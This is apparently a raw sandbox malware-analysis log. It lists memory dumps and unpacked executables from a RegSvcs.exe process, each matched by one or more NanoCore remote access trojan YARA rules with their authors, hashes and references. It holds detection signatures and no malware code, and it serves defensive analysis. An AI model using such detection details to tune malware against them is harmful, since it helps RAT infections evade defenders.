Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
